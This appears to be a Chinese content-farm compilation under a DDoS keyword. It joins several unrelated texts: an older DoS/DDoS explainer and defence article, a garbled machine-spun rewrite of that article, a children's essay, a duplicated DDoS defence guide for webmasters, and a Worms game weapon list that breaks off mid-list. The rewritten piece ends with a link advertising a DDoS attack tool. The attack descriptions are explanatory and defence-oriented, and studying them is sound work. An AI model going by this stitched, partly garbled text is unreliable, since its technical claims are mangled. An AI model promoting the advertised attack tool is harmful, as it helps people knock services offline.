“大海的边”通过精心收集,向本站投稿了7篇的终极武器DDoS技术一览,以下是小编整理后的的终极武器DDoS技术一览,欢迎阅读分享,希望对您有所帮助。
- 目录
篇1: 的终极武器DDoS技术一览
5月22号星期二,只是Pittsburgh Carnegie Mellon大学CERT交流中心的另一个寻常的日子.被认为是计算机安全的泰斗的CERT将在这一天被 们“离散的服务拒绝”(DDoS)的攻击手段踢出网络.
时至,就是网络安全界鼻祖自己的安全也岌岌可危.如果CERT能被攻击,你也逃不掉的.
你可以为避免互联网上的DDoS攻击作出一点贡献并且同时使你在网络攻击面前不那么脆弱.但是如果有人真的想要用DDoS攻击使你的服务器瘫痪,他们是能够做到的.微软,雅虎和Exodus都在过去的12个月里遭到了DDos的毒手;你或是你的客户可能成为下一个目标.
野兽的本性
“拒绝服务”攻击就象它们的名字说的一样:阻止你的服务器发送你提供的服务.攻击者可以通过多种手段达到这个目的.例如,Outlook e-mail 蠕虫病毒Melissa及其同类可以被看作是DoS攻击的代理者,因为它们驱使Outlook程序的客户端向服务器不停的发出充满了蠕虫病毒的信件直到服务器在重压之下瘫痪.
这是非常重要的一点.人们通常将DoS攻击的过程看成是用无用的信息来阻塞网络的带宽.当然,这是DoS攻击的一种,但是另一种消耗服务器资源方式的攻击也会成功.那意味着通过一个低速的modem连接来进行一次成功的DoS攻击也是可能的,只要它是冲着服务器资源去的.要真正保护一个网络,网络本身和其上的服务器都必须全副武装.
对于企业用户来说,防火墙和象Zone Labs 公司的Zone Alarm Pro软件可以帮忙.另外,有几家公司,诸如
Asta 网络公司和Mazu网络公司目前都提供对DDoS攻击的企业级的保护.
Asta公司的Vantage系统采用了类似于反病毒软件的技术:寻找可能的DDoS攻击的各种征兆.它不停地将网络上数据包和已知的DDoS数据包的定式比较,这些定式包括流往域名服务器(DNS)的非标准的数据流.但当它发现了可能的攻击,Vantage系统会提示网络管理员,然后网络管理员就能使用路由过滤器甚至在数据流传送的途中关闭网络服务器来阻止攻击.
Mazu网络公司为DDoS设计的TrafficMaster Inspector通过不停地进行以G为单位的以太网速度的数据检查,并且尽可能远的追溯数据来源.简单的说,Mazu希望能够实时的探测到网络攻击,然后让正常的数据包通过同时将DDoS数据包阻挡起来.它对网络的这种保护使得它适合于ISP和数据中心服务器.
通常,DoS攻击的目标是你网络的TCP/IP内层结构.这些攻击分为三种:一种是利用给定的TCP/IP协议栈软件的弱点;二种是利用TCP/IP协议的漏洞;第三种是不断尝试的野蛮攻击.
破坏TCP/IP
一个利用TCP/IP协议软件弱点进行进攻的经典的例子是Ping of Death攻击.利用的具体方法是,你的对手创建一个超过了IP标准的最大长度--65535个字节的IP数据包.当这个“浮肿的”数据包到达的时候,它就使得一个使用脆弱的TCP/IP协议软件和操作系统的服务器瘫痪.
所有现代的操作系统和协议软件对Ping of Death攻击都有免疫力,但是老的Unix系统可能仍然是脆弱的.
另一个利用粗制滥造的TCP/IP软件进行攻击的例子是Teardrop,它利用了系统重组IP数据包过程中的漏洞.一个数据包在从互联网的另一端到你这里的路上也许会被分拆成更小的数据报文.这些数据报中的每一个都拥有最初的IP数据报的报头,同时还拥有一个偏移字节来标示它拥有原始数据报中的哪些字节.通过这些信息,一个被正常分割的数据报文能够在它的目的地被重新组装起来,并且网络也能够正常运转而不被中断.当一次Teardrop攻击开始时,你的服务器将受到拥有重叠的偏移字段的IP数据包的轰炸.如果你的服务器或是路由器不能丢弃这些数据包而且如果企图重组它们,你的服务器就会很快瘫痪.如果你的系统被及时更新了,或者你拥有一个可以阻挡Teardrop数据包的防火墙,你应该不会有什么麻烦.
利用TCP/IP协议本身的漏洞来进行攻击的手段也很多.这些手段中最流行的就是SYN攻击.SYN工作的原理就是利用两个互联网程序间协议握手的过程进行的攻击.协议握手的过程如下,其中一个应用程序向另一个程序发送一个TCP SYN(同步)数据包.然后目标程序向第一个程序发送一个TCP-ACK应答数据包作为回答;第一个程序最后用一个ACK应答数据包确认已经收到.一旦这两个程序握手成功,它们就准备一起运行了.
SYN攻击用一堆TCP SYN数据包来淹没它的受害者.每个SYN数据包迫使目标服务器产生一个SYN-ACK应答数据包然后等待对应的ACK应答.这很快就导致过量的SYN-ACK一个接一个的堆积在缓存队列里.当缓存队列满了以后,系统就会停止应答到来的SYN请求.
如果SYN攻击中包括了拥有错误IP源地址的SYN数据包,情况很快就会变得更糟.在这种情况下,当SYN-ACK被送出的时候,ACK应答就永远不会被收到.飞快充满的缓存队列使得合法程序的SYN请求无法再通过.
更加厉害的是,与之相似的Land攻击手段使用欺骗性的SYN数据包,它带有一个伪装的IP地址,使得它看起来像是来自你自己的网络.现在,SYN攻击就像是来自于你防火墙的内部,这使得问题更加严重.
大多数时新的操作系统和防火墙可以阻止SYN攻击.另一个简单的阻止SYN攻击的方法是阻塞掉所有带有已知的错误的IP源地址的数据包.这些数据包应该包括带有错误的为内部保留的IP地址的外部数据包,它的范围是从10.0.0.0到10.255.255.255,127.0.0.0到127.255.255.255,从172.16.0.0到172.31.255.255以及从192.168.0.0到192.168.255.255
野蛮手段
但是当你的敌人能够轻易的推倒你的系统的时候,他为什么要躲躲藏藏的呢?Smurf攻击和用户数据报文协议冲击就使用了这样的手段.
当你被Smurf攻击的时候,攻击者用互联网控制信息协议(ICMP)的应答数据包--一种特殊的ping数据包来填充你的路由器.这些数据包的目的IP地址同时是你的广播地址,这使得你的路由器将ICMP数据包广播到网络上的每一台主机.不言自明的是,对于一个大型网络来说,它将引起巨大的网络信息流量.而且,就像Land攻击那样,如果 将Smurf攻击和欺骗手段结合起来,破坏力就更大.
避免Smurf攻击的一种简单的方法就是在路由器中禁用广播地址并且设置你的防火墙来过滤ICMP应答协议.你也可以设置你的服务器来使得它不对发送ICMP数据包到IP广播地址的要求做出响应.这些设置不会影响到你的网络的正常工作因为很少有应用程序使用IP协议的广播功能.
要对付采用UDP冲击方法的DoS攻击就不那么容易了,因为一些合法的应用程序,比方说RealVideo,也使用UDP协议.在一次UDP冲击中,攻击者伪造出一个请求,将一个系统的UDP开启测试服务程序与另一个系统的UDP应答程序连在一起.UDP开启测试服务程序是一个用于测试的从收到的数据包产生字符的程序.结果是,由UDP开启测试服务程序伪随机产生的字符在两个系统间不停的被反射,使得合法应用程序的带宽要求得不到满足.
一种阻止UDP攻击的方法是禁用或者过滤对主机的所有UDP服务要求.只要你允许非服务请求的UDP请求通过,使用UDP协议的或是把UDP协议当作备用数据传输协议的通常的应用程序将继续正常工作.
使用这些防御的方法,你可能认为应付DoS攻击就像应付一根火腿肠一样容易.你错了.因为发动DDoS攻击是如此的容易,任何心怀不轨的人都能组织起几十台甚至上百台计算机来对你的系统发动DoS攻击.
单是巨大的参与攻击的计算机的数量就能冲垮你的堡垒并将你的网络塞满垃圾信息.使用Tribe Force
Network(TFN),Trin00或是Stacheldraht这样的工具,任何人都可以将DDoS的攻击“僵尸”植入一些毫无防范的系统中.然后,攻击者发送攻击目标的信息以及攻击的指令.DDoS瞬间即至.
这些在到被发明的攻击方法是容易被察觉的.但是,新一点的DDoS却使用“脉动僵尸.”这种攻击手段并不使用野蛮的攻击,而是发送一波一波的小带宽的数据,这样,它们就能绕过那些为密集进攻而设置的网络警报器.
如何应对残酷的现状
DDoS攻击只可能增加.随着互联网的扩大,更多的用户将获得对网络的宽带接入,这给了 们更多的可以利用的系统. 火上浇油的是,微软将它的Windows XP操作系统定位为下一代的面向大多数消费者的操作系统,Windows XP将使用“原始的”TCP/IP套接字.通常,程序员们在编写程序时使用与其功能相关的套接字--套接字是一种将应用程序与TCP/IP相连的软件对象.
TCP/IP协议同时定义了一种SOCK_ROW的套接字类型.并不是所有的操作系统支持这种套接字,但是Unix和Windows XP支持.使用原始套接字,一个程序员可以编写代码调用任何TCP/IP套接字.只要对不按TCP/IP标准进行编程很在行,原始套接字就能让程序员编写非法的应用程序,比方说DDoS僵尸,因为它们允许程序员以一种无法预料的方式使用广泛流行的套接字.例如,你可以使用原始套接字来编写DDoS攻击程序,它们使用套接字80--Web超文本传输协议选择的套接字,来获取它的指令.
虽然Windows ,Unix和它的后代,Linux和BSD操作系统,也支持原始套接字,但这些操作体统是被拥有足够技术的行家照看着的.这些用户即使不能使他们的系统以适当地方式运行,他们也懂得如何锁定这些系统.但是XP却将由一个刚刚从电脑城里将它买回来的人看管,它远不太可能被一个专家级的管理员来使用并查找出新的DDoS代理程序.
因为这一点,Gibson 研究团体的Steve Gibson预言说目前DDoS攻击的爆炸式的增长(据Gibson估计为每星期4,000次)将大幅度增加.从理论上讲,这将使互联网本身因为成百上千的DDoS攻击而减慢速度.
除了保护你的系统不被DDoS 僵尸和上面所述的方法攻击,你还应该鼓励任何使用宽带互联网的人安装一个基本的防火墙.ZDNet的下载站点有一长串的个人防火墙,这些防火墙易于使用并且提供基本的保护功能.
one Labs公司的ZoneAlarm就是一种由专家推荐给那些想要了解在他的网络连接上究竟发生了些什么的初级用户的软件.在一位朋友的使用DSL连接的电脑上使用了ZoneAlarm后我们发现了两个,不是一个,蓄势待发的DDoS僵尸.我们还注意到每天都有人企图非法闯入他的系统.如果你拥有宽带连接,那么安全不仅仅是一个好主意,它是一种必要.
什么样的防御是足够的呢?只有时间和经验才能告诉我们,但是如果现在你不打算保护你不受DDoS的攻击,你不仅有失去网络连接的危险,你本身就可能成为网络安全问题的一部分了.(续)
篇2:简评 的终极武器DDoS
说到 的终极兵器,那就真的不得不说到DDoS了,可以某些用户对这个东西不是十分的知道,不过从事计算机安全的人员却往往是听到这个姓名, 其程度比闻风丧胆还要严峻。终究这个DDoS有什么地方那么恐惧呢,下面会为你作一些简略的阐明。
通常,DoS进犯的方针是你网络的TCP/IP内层布局,而这些进犯分为三种:一种是运用TCP/IP协议的缝隙;二种是运用给定的TCP/IP协议栈软件的缺点;第三种是不断测验的粗野进犯。
说起这个 软件的损坏力,那就不可以不说起网络安全界开山祖师CERT被进犯的作业了。5月22日,星期二,这正本仅仅Pittsburgh Carnegie Mellon大学CERT 交流中心的一个寻常的日子。可是就在这一天,被认为是计算机安全的权威的CERT将在这一天被 们“离散的效劳回绝”(DDoS)的进犯手法踢出网络。别的,微软、雅虎和Exodus都在曩昔的12个月里遭到了DDos的棘手;可以成为下一个方针很可以就是你或许是你的客户喔。究竟,若是有人真的想要用 DDoS进犯你的效劳器而使其瘫痪,他们是肯定有才能做到的,并且是防不胜防。
“离散的效劳回绝”主要是经过阻碍你的效劳器发送你所供给的效劳而作业的。要抵达这个意图, 可以有许多种办法,例如最典型的就是Outlook e-mail 蠕虫病毒Melissa及其同类了,由于它们可以唆使Outlook 顺序的客户端向效劳器不断的宣布充满了蠕虫病毒的函件直到效劳器在重压之下瘫痪。许多人一说到DoS进犯的进程,就会联想到是用许多无用的信息来堵塞网络,以此来抵达使其瘫痪的意图。其实这仅仅其间一个比拟典型的办法。事实上还有一种办法其实也是十分有用的,那就是名为耗费效劳器资源办法的进犯。这种进犯是用一个低速的modem连接来进行的。
其间,Mazu网络公司描绘的TrafficMaster Inspector是一种抵挡DDoS的好东西。经过不断地进行以G为单位的以太网速度的数据查看,并且尽可以远的追溯数据来历。简略的说,Mazu期望可以实时的探测到网络进犯,然后让正常的数据包经过一起将DDoS数据包阻挠起来,
它对网络的这种维护使得它适合于ISP和数据中心效劳器。
关于公司用户来说,可以经过装置一些软件例如防火墙和象Zone Labs 公司的Zone Alarm Pro等,这些都可以起到免受或抑制DDoS进犯的效果。别的,公司用户也可以寻求Asta 网络公司的协助。Asta 网络公司开发了一种Vantage体系,这种体系可以起到一种类似于反病毒软件的效果,主要是起到防止的效果,当它发现了可以的进犯,Vantage体系会提示网络管理员,然后网络管理员就能运用路由过滤器甚至在数据流传送的途中封闭网络效劳器来阻碍进犯。而这个体系是经过剖析和寻觅可以的DDoS进犯的在通常进犯前的特色,它不断地将网络上数据包和已知的DDoS数据包的定式比拟,这些定式包罗流往域名效劳器(DNS)的非规范的数据流,若是当它发现问题的时分,就会提示网络管理员了。
上面现已说过,DDoS其间的一种损坏办法就是损坏TCP/IP协议。其间最典型的比如就是Ping of Death进犯啦,这些 缔造了一个超越了IP规范的最大长度--65535个字节的IP数据包。(Sinbad注:Ping 'o Death进犯是发送多个IP分片,总长度超越65535;jolt2才是接连发送一个偏移量很大的数据包)当这个“浮肿的”数据包抵达的时分,,它就使得一个运用软弱的TCP/IP协议软件和操作体系的效劳器瘫痪。别的一个进行进犯的比如是Teardrop, 它主要是运用了体系重组IP数据包进程中的缝隙作业的。一个数据包在从互联网的另一端到你这里的路上或许会被分拆成更小的数据报文。这些数据报中的每一个都具有开始的IP数据报的报头,一起还具有一个偏移字节来标明它具有原始数据报中的哪些字节。经过这些信息,一个被正常切割的数据报文可以在它的意图地被从头拼装起来,并且网络也可以正常运转而不被中止。当一次Teardrop进犯开始时,你的效劳器将遭到具有堆叠的偏移字段的IP数据包的轰炸。若是你的效劳器或是路由器不能丢掉这些数据包并且若是妄图重组它们,你的效劳器就会很快瘫痪。若是你的体系被及时更新了,或许你具有一个可以阻挠Teardrop 数据包的防火墙,你应该不会有什么费事。
网址:www.zkddos.com(ddos攻击器)
篇3:“终极武器”
“终极武器”_小学作文
这儿本是一望无际的良田沃土,多年的战火,把它变成了寸草不生的沙漠。可是战争狂们还不肯善罢甘休,他们约定:要进行一次最后决战,来拼个你死我活!战场上空出现了交战各国总统的全身影像,他们一个个高耸云天,威风凛凛,都恨不得一口把对方吞掉!
A国总统首先叫战:“我带来了终极武器――死光!要不要尝尝它的厉害?它能叫坦克、大炮和飞机霎时化为青烟,也能把人烧成焦炭,更小的光束可以在敌人身上钻洞……更别说它产生的电波和辐射的杀伤力了!我劝你们还是趁早投降吧!”
“那算得了什么终极武器?”B国总统根本没把A国总统放在眼里,“现代战争就是信息战。我准备了100百万种电脑病毒,只要我让它们出击,只需片刻时间就可以叫你们的指挥和武器操作系统瘫痪,让你们变成聋子和瞎子,甚至命令你的死光对准你们自己的部队!”B国总统狞笑着举起一只小匣子,“它们都在这里准备着,我动动手指,它们就能通过无线电波飞往世界任何一个角落!”
这招果然厉害!除非先下手。
Q国准备的是化学毒剂,只要花上600美元那么一点点钱,就能将1000平方千米内的人员全部杀死,比原子弹还恐怖。他们打算抢在敌人之前施放毒剂。
W、X、Y等国也纷纷亮出了自己的王牌:氢弹、中子弹、基因武器……一场毁灭性的大战迫在眉睫!这时候空中显出一个矮小的老人。
你是什么人?竟敢到这儿来!”大家一齐喝问。
“我是真正的强者。”老人说,“我带来了名副其实的'‘终极武器’!”老人说罢,在沙漠撒下一些种子。真奇怪!种子一下地,立即发芽长叶抽蔓开花,很快结出一个个小巧的葫芦。葫芦滴溜溜地滚向四方,炸开了,溅出肥皂泡似的物质,顿时,所有的炮口和毒剂发射器都被凝结,飞机飞不上天,核潜艇下不了海,“死光”也变成了真正的“死光”,一动不动,再也伤不了人啦!
葫芦在沙漠上飞快地繁殖开来,它的叶子吸收了空气中的氢和氧,化合成水,反而顺着藤蔓流下地,形成一个个清澈的小湖。无数鸟兽昆虫都赶来饮水,它们带来的植物种子,就在湖边生根长叶,沙漠变成了绿洲……
那些被解除了武装的战争狂们这才如梦初醒。是呀,他们的武器只会毁灭生命,而能够把沙漠变成绿洲,把生命还给大地的,才是真正的“终极武器”啊!
所有的国家都销毁了各自的武器,在那位老科学家的带领下,共同建设这片新生的绿洲。
篇4:终极防御指南之DDOS攻击
简述:由于近期DDOS攻击越来越广泛,本站特邀请我们的名誉技术顾问、网络安全专家孤独剑客先生结合多年抵御DDOS攻击的经验独家撰写此文,文中不仅深入浅出地阐述了分布式拒绝服务攻击DDOS的概念、流行的DDOS攻击手段及判断是否被DDOS攻击的方法,而且还结合实际给出了全面的DDOS实战防御建议,希望此文能帮助网站站长们早日摆脱DDOS攻击的困扰,我们热诚欢迎共同探讨DDOS相关话题,
一、为何要DDOS?
随着Internet互联网络带宽的增加和多种DDOS 工具的不断发布,DDOS拒绝服务攻击的实施越来越容易,DDOS攻击事件正在成上升趋势。出于商业竞争、打击报复和网络敲诈等多种因素,导致很多IDC托管机房、商业站点、游戏服务器、聊天网络等网络服务商长期以来一直被DDOS攻击所困扰,随之而来的是客户投诉、同虚拟主机用户受牵连、法律纠纷、商业损失等一系列问题,因此,解决DDOS攻击问题成为网络服务商必须考虑的头等大事。
二、什么是DDOS?
DDOS是英文Distributed Denial of Service的缩写,意即“分布式拒绝服务”,那么什么又是拒绝服务(Denial of Service)呢?可以这么理解,凡是能导致合法用户不能够访问正常网络服务的行为都算是拒绝服务攻击。也就是说拒绝服务攻击的目的非常明确,就是要阻止合法用户对正常网络资源的访问,从而达成攻击者不可告人的目的。虽然同样是拒绝服务攻击,但是DDOS和DOS还是有所不同,DDOS的攻击策略侧重于通过很多“僵尸主机”(被攻击者入侵过或可间接利用的主机)向受害主机发送大量看似合法的网络包,从而造成网络阻塞或服务器资源耗尽而导致拒绝服务,分布式拒绝服务攻击一旦被实施,攻击网络包就会犹如洪水般涌向受害主机,从而把合法用户的网络包淹没,导致合法用户无法正常访问服务器的网络资源,因此,拒绝服务攻击又被称之为“洪水式攻击”,常见的DDOS攻击手段有SYN Flood、ACK Flood、UDP Flood、ICMP Flood、TCP Flood、Connections Flood、Script. Flood、Proxy Flood等;而DOS则侧重于通过对主机特定漏洞的利用攻击导致网络栈失效、系统崩溃、主机死机而无法提供正常的网络服务功能,从而造成拒绝服务,常见的DOS攻击手段有TearDrop、Land、Jolt、IGMP Nuker、Boink、Smurf、Bonk、OOB等,
就这两种拒绝服务攻击而言,危害较大的主要是DDOS攻击,原因是很难防范,至于DOS攻击,通过给主机服务器打补丁或安装防火墙软件就可以很好地防范,后文会详细介绍怎么对付DDOS攻击。
三、被DDOS了吗?
DDOS的表现形式主要有两种,一种为流量攻击,主要是针对网络带宽的攻击,即大量攻击包导致网络带宽被阻塞,合法网络包被虚假的攻击包淹没而无法到达主机;另一种为资源耗尽攻击,主要是针对服务器主机的攻击,即通过大量攻击包导致主机的内存被耗尽或CPU被内核及应用程序占完而造成无法提供网络服务。
如何判断网站是否遭受了流量攻击呢?可通过Ping命令来测试,若发现Ping超时或丢包严重(假定平时是正常的),则可能遭受了流量攻击,此时若发现和你的主机接在同一交换机上的服务器也访问不了了,基本可以确定是遭受了流量攻击。当然,这样测试的前提是你到服务器主机之间的ICMP协议没有被路由器和防火墙等设备屏蔽,否则可采取Telnet主机服务器的网络服务端口来测试,效果是一样的。不过有一点可以肯定,假如平时Ping你的主机服务器和接在同一交换机上的主机服务器都是正常的,突然都Ping不通了或者是严重丢包,那么假如可以排除网络故障因素的话则肯定是遭受了流量攻击,再一个流量攻击的典型现象是,一旦遭受流量攻击,会发现用远程终端连接网站服务器会失败。
相对于流量攻击而言,资源耗尽攻击要容易判断一些,假如平时Ping网站主机和访问网站都是正常的,发现突然网站访问非常缓慢或无法访问了,而Ping还可以Ping通,则很可能遭受了资源耗尽攻击,此时若在服务器上用Netstat -na命令观察到有大量的SYN_RECEIVED、TIME_WAIT、FIN_WAIT_1等状态存在,而ESTABLISHED很少,则可判定肯定是遭受了资源耗尽攻击。还有一种属于资源耗尽攻击的现象是,Ping自己的网站主机Ping不通或者是丢包严重,而Ping与自己的主机在同一交换机上的服务器则正常,造成这种原因是网站主机遭受攻击后导致系统内核或某些应用程序CPU利用率达到100%无法回应Ping命令,其实带宽还是有的,否则就Ping不通接在同一交换机上的主机了。
篇5:《站长必读:防御DDOS攻击终极指南》
本文作者:孤独剑客
发布日期:12月18日
发布网站:www.hackbase.com
简述:由于近期DDOS攻击越来越广泛,本站特邀请我们的名誉技术顾问、网络安全专家孤独剑客先生结合多年抵御DDOS攻击的经验独家撰写此文,文中不仅深入浅出地阐述了分布式拒绝服务攻击DDOS的概念、流行的DDOS攻击手段及判断是否被DDOS攻击的方法,而且还结合实际给出了全面的DDOS实战防御建议,希望此文能帮助网站站长们早日摆脱DDOS攻击的困扰,我们热诚欢迎共同探讨DDOS相关话题, 基地www.hackbase.com
关键词:DDOSSYNFLOOD防火墙
一、为何要DDOS?
随着Internet互联网络带宽的增加和多种DDOS 工具的不断发布,DDOS拒绝服务攻击的实施越来越容易,DDOS攻击事件正在成上升趋势。出于商业竞争、打击报复和网络敲诈等多种因素,导致很多IDC托管机房、商业站点、游戏服务器、聊天网络等网络服务商长期以来一直被DDOS攻击所困扰,随之而来的是客户投诉、同虚拟主机用户受牵连、法律纠纷、商业损失等一系列问题,因此,解决DDOS攻击问题成为网络服务商必须考虑的头等大事。
二、什么是DDOS?
DDOS是英文DistributedDenialofService的缩写,意即“分布式拒绝服务”,那么什么又是拒绝服务(DenialofService)呢?可以这么理解,凡是能导致合法用户不能够访问正常网络服务的行为都算是拒绝服务攻击。也就是说拒绝服务攻击的目的非常明确,就是要阻止合法用户对正常网络资源的访问,从而达成攻击者不可告人的目的。虽然同样是拒绝服务攻击,但是DDOS和DOS还是有所不同,DDOS的攻击策略侧重于通过很多“僵尸主机”(被攻击者入侵过或可间接利用的主机)向受害主机发送大量看似合法的网络包,从而造成网络阻塞或服务器资源耗尽而导致拒绝服务,分布式拒绝服务攻击一旦被实施,攻击网络包就会犹如洪水般涌向受害主机,从而把合法用户的网络包淹没,导致合法用户无法正常访问服务器的网络资源,因此,拒绝服务攻击又被称之为“洪水式攻击”,常见的DDOS攻击手段有SYNFlood、ACKFlood、UDPFlood、ICMPFlood、TCPFlood、ConnectionsFlood、ScriptFlood、ProxyFlood等;而DOS则侧重于通过对主机特定漏洞的利用攻击导致网络栈失效、系统崩溃、主机死机而无法提供正常的网络服务功能,从而造成拒绝服务,常见的DOS攻击手段有TearDrop、Land、Jolt、IGMPNuker、Boink、Smurf、Bonk、OOB等。就这两种拒绝服务攻击而言,危害较大的主要是DDOS攻击,原因是很难防范,至于DOS攻击,通过给主机服务器打补丁或安装防火墙软件就可以很好地防范,后文会详细介绍怎么对付DDOS攻击。
三、被DDOS了吗?
DDOS的表现形式主要有两种,一种为流量攻击,主要是针对网络带宽的攻击,即大量攻击包导致网络带宽被阻塞,合法网络包被虚假的攻击包淹没而无法到达主机;另一种为资源耗尽攻击,主要是针对服务器主机的攻击,即通过大量攻击包导致主机的内存被耗尽或CPU被内核及应用程序占完而造成无法提供网络服务。
如何判断网站是否遭受了流量攻击呢?可通过Ping命令来测试,若发现Ping超时或丢包严重(假定平时是正常的),则可能遭受了流量攻击,此时若发现和你的主机接在同一交换机上的服务器也访问不了了,基本可以确定是遭受了流量攻击。当然,这样测试的前提是你到服务器主机之间的ICMP协议没有被路由器和防火墙等设备屏蔽,否则可采取Telnet主机服务器的网络服务端口来测试,效果是一样的。不过有一点可以肯定,假如平时Ping你的主机服务器和接在同一交换机上的主机服务器都是正常的,突然都Ping不通了或者是严重丢包,那么假如可以排除网络故障因素的话则肯定是遭受了流量攻击,再一个流量攻击的典型现象是,一旦遭受流量攻击,会发现用远程终端连接网站服务器会失败。
相对于流量攻击而言,资源耗尽攻击要容易判断一些,假如平时Ping网站主机和访问网站都是正常的,发现突然网站访问非常缓慢或无法访问了,而Ping还可以Ping通,则很可能遭受了资源耗尽攻击,此时若在服务器上用Netstat-na命令观察到有大量的SYN_RECEIVED、TIME_WAIT、FIN_WAIT_1等状态存在,而ESTABLISHED很少,则可判定肯定是遭受了资源耗尽攻击。还有一种属于资源耗尽攻击的现象是,Ping自己的网站主机Ping不通或者是丢包严重,而Ping与自己的主机在同一交换机上的服务器则正常,造成这种原因是网站主机遭受攻击后导致系统内核或某些应用程序CPU利用率达到100%无法回应Ping命令,其实带宽还是有的,否则就Ping不通接在同一交换机上的主机了。
当前主要有三种流行的DDOS攻击:
1、SYN/ACKFlood攻击:这种攻击方法是经典最有效的DDOS方法,可通杀各种系统的网络服务,主要是通过向受害主机发送大量伪造源IP和源端口的SYN或ACK包,导致主机的缓存资源被耗尽或忙于发送回应包而造成拒绝服务,由于源都是伪造的故追踪起来比较困难,缺点是实施起来有一定难度,需要高带宽的僵尸主机支持。少量的这种攻击会导致主机服务器无法访问,但却可以Ping的通,在服务器上用Netstat-na命令会观察到存在大量的SYN_RECEIVED状态,大量的这种攻击会导致Ping失败、TCP/IP栈失效,并会出现系统凝固现象,即不响应键盘和鼠标,
普通防火墙大多无法抵御此种攻击。
2、TCP全连接攻击:这种攻击是为了绕过常规防火墙的检查而设计的,一般情况下,常规防火墙大多具备过滤TearDrop、Land等DOS攻击的能力,但对于正常的TCP连接是放过的,殊不知很多网络服务程序(如:IIS、Apache等Web服务器)能接受的TCP连接数是有限的,一旦有大量的TCP连接,即便是正常的,也会导致网站访问非常缓慢甚至无法访问,TCP全连接攻击就是通过许多僵尸主机不断地与受害服务器建立大量的TCP连接,直到服务器的内存等资源被耗尽而被拖跨,从而造成拒绝服务,这种攻击的特点是可绕过一般防火墙的防护而达到攻击目的,缺点是需要找很多僵尸主机,并且由于僵尸主机的IP是暴露的,因此容易被追踪。
3、刷Script脚本攻击:这种攻击主要是针对存在ASP、JSP、PHP、CGI等脚本程序,并调用MSSQLServer、MySQLServer、Oracle等数据库的网站系统而设计的,特征是和服务器建立正常的TCP连接,并不断的向脚本程序提交查询、列表等大量耗费数据库资源的调用,典型的以小博大的攻击方法。一般来说,提交一个GET或POST指令对客户端的耗费和带宽的占用是几乎可以忽略的,而服务器为处理此请求却可能要从上万条记录中去查出某个记录,这种处理过程对资源的耗费是很大的,常见的数据库服务器很少能支持数百个查询指令同时执行,而这对于客户端来说却是轻而易举的,因此攻击者只需通过Proxy代理向主机服务器大量递交查询指令,只需数分钟就会把服务器资源消耗掉而导致拒绝服务,常见的现象就是网站慢如蜗牛、ASP程序失效、PHP连接数据库失败、数据库主程序占用CPU偏高。这种攻击的特点是可以完全绕过普通的防火墙防护,轻松找一些Proxy代理就可实施攻击,缺点是对付只有静态页面的网站效果会大打折扣,并且有些Proxy会暴露攻击者的IP地址。
四、怎么抵御DDOS?
对付DDOS是一个系统工程,想仅仅依靠某种系统或产品防住DDOS是不现实的,可以肯定的是,完全杜绝DDOS目前是不可能的,但通过适当的措施抵御90%的DDOS攻击是可以做到的,基于攻击和防御都有成本开销的缘故,若通过适当的办法增强了抵御DDOS的能力,也就意味着加大了攻击者的攻击成本,那么绝大多数攻击者将无法继续下去而放弃,也就相当于成功的抵御了DDOS攻击。以下为笔者多年以来抵御DDOS的经验和建议,和大家分享!
1、采用高性能的网络设备
首先要保证网络设备不能成为瓶颈,因此选择路由器、交换机、硬件防火墙等设备的时候要尽量选用知名度高、口碑好的产品。再就是假如和网络提供商有特殊关系或协议的话就更好了,当大量攻击发生的时候请他们在网络接点处做一下流量限制来对抗某些种类的DDOS攻击是非常有效的。
2、尽量避免NAT的使用
无论是路由器还是硬件防护墙设备要尽量避免采用网络地址转换NAT的使用,因为采用此技术会较大降低网络通信能力,其实原因很简单,因为NAT需要对地址来回转换,转换过程中需要对网络包的校验和进行计算,因此浪费了很多CPU的时间,但有些时候必须使用NAT,那就没有好办法了。
3、充足的网络带宽保证
网络带宽直接决定了能抗受攻击的能力,假若仅仅有10M带宽的话,无论采取什么措施都很难对抗现在的SYNFlood攻击,当前至少要选择100M的共享带宽,最好的当然是挂在1000M的主干上了。但需要注意的是,主机上的网卡是1000M的并不意味着它的网络带宽就是千兆的,若把它接在100M的交换机上,它的实际带宽不会超过100M,再就是接在100M的带宽上也不等于就有了百兆的带宽,因为网络服务商很可能会在交换机上限制实际带宽为10M,这点一定要搞清楚。
4、升级主机服务器硬件
在有网络带宽保证的前提下,请尽量提升硬件配置,要有效对抗每秒10万个SYN攻击包,服务器的配置至少应该为:P42.4G/DDR512M/SCSI-HD,起关键作用的主要是CPU和内存,若有志强双CPU的话就用它吧,内存一定要选择DDR的高速内存,硬盘要尽量选择SCSI的,别只贪IDE价格不贵量还足的便宜,否则会付出高昂的性能代价,再就是网卡一定要选用3COM或Intel等名牌的,若是Realtek的还是用在自己的PC上吧。
5、把网站做成静态页面
大量事实证明,把网站尽可能做成静态页面,不仅能大大提高抗攻击能力,而且还给 入侵带来不少麻烦,至少到现在为止关于HTML的溢出还每出现,看看吧!新浪、搜狐、网易等门户网站主要都是静态页面,若你非需要动态脚本调用,那就把它弄到另外一台单独主机去,免的遭受攻击时连累主服务器,当然,适当放一些不做数据库调用脚本还是可以的,此外,最好在需要调用数据库的脚本中拒绝使用代理的访问,因为经验表明使用代理访问你网站的80%属于恶意行为。
6、增强操作系统的TCP/IP栈
Win和Win作为服务器操作系统,本身就具备一定的抵抗DDOS攻击的能力,只是默认状态下没有开启而已,若开启的话可抵挡约10000个SYN攻击包,若没有开启则仅能抵御数百个,具体怎么开启,自己去看微软的文章吧!《强化TCP/IP堆栈安全》-www.microsoft.com/china/technet/security/guidance/secmod109.mspx
也许有的人会问,那我用的是Linux和FreeBSD怎么办?很简单,按照这篇文章去做吧!《SYNCookies》-cr.yp.to/syn
篇6:百战天虫6武器+技巧一览
下载地址:百战天虫6
4号键吊出武器菜单
5号射击
7号前跳
8号键单击 上跳 注意 双吉8号是翻滚的跳(可以在空中丢炸弹什么的)
0号 look map
第1排
1,火箭炮 (最常用武器,注意风向,没数量限制,威力不错,)
2,追踪导弹 (威力中等,可以不用瞄准,有数量限制。威力一般。完全可以先瞄准后对着天然后蓄力发射)
3,破击炮 (威力大,比较难以瞄准。没有蓄力系统)
4,手榴弹 (最常用武器,要练习。)
5,会有子炸弹的手榴弹 (威力大,爆炸后会变成很多小炸弹,继续爆炸,适用于往坑中丢)
第2排
1,斧头 (。。。。冷兵器,比较野蛮。)
2, 枪(2发,敲洞或者精确射击。点射,把敌人往水里打)
3, (忘了多少发,同上)
4,机关枪(比较猛的东西,敌人逼在墙角准的话可以费90滴血。或者在斜坡上用把敌人打上天)
第3排
